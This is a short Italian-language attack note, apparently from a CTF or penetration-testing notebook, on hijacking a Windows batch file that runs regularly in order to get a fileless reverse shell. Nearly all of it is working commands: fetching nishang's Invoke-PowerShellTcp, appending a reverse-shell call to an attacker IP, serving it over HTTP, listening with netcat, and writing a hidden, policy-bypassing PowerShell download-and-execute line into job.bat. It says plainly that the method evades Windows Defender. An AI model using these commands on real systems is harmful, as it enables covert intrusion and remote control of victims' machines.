tags: Esecuzione_Comando_In_Wevtutil Malware_Fileless Fileless_Reverse_Shell
Quando troviamo uno script che viene eseguito regolarmente tramite wevtutil.exe possiamo modificarlo nel seguente modo:
Per prima cosa scarica questo file sulla macchina attaccante:
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1Ora modifica questo file e aggiungi in fondo questa riga (che è la reverse shell):
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.17.7 -Port 4444Creiamo un server per permettere alla vittima di scaricare il nostro file
python3 -m http.serverE un altro dove ricevere la reverse shell:
nc -lvnp 4444Ora dalla macchina vittima lanciamo il seguente comando:
echo powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.17.7:8000/PowerShellTcp.ps1')" > C:\Log-Management\job.batDove job.bat è il file che viene eseguito regolarmente.
In questo modo carichiamo ed eseguiamo il file direttamente in memoria senza lasciare file sulla macchina vittima evitando così l’individuazione da parte di Windows Defender.
Su Windows 10/11 aggiornati e Server 2016+, esiste una cosa chiamata AMSI che scansiona anche la memoria RAM. Su macchine un po’ più datate (come spesso accade nelle CTF o server non patchati), questa tecnica è letale e invisibile.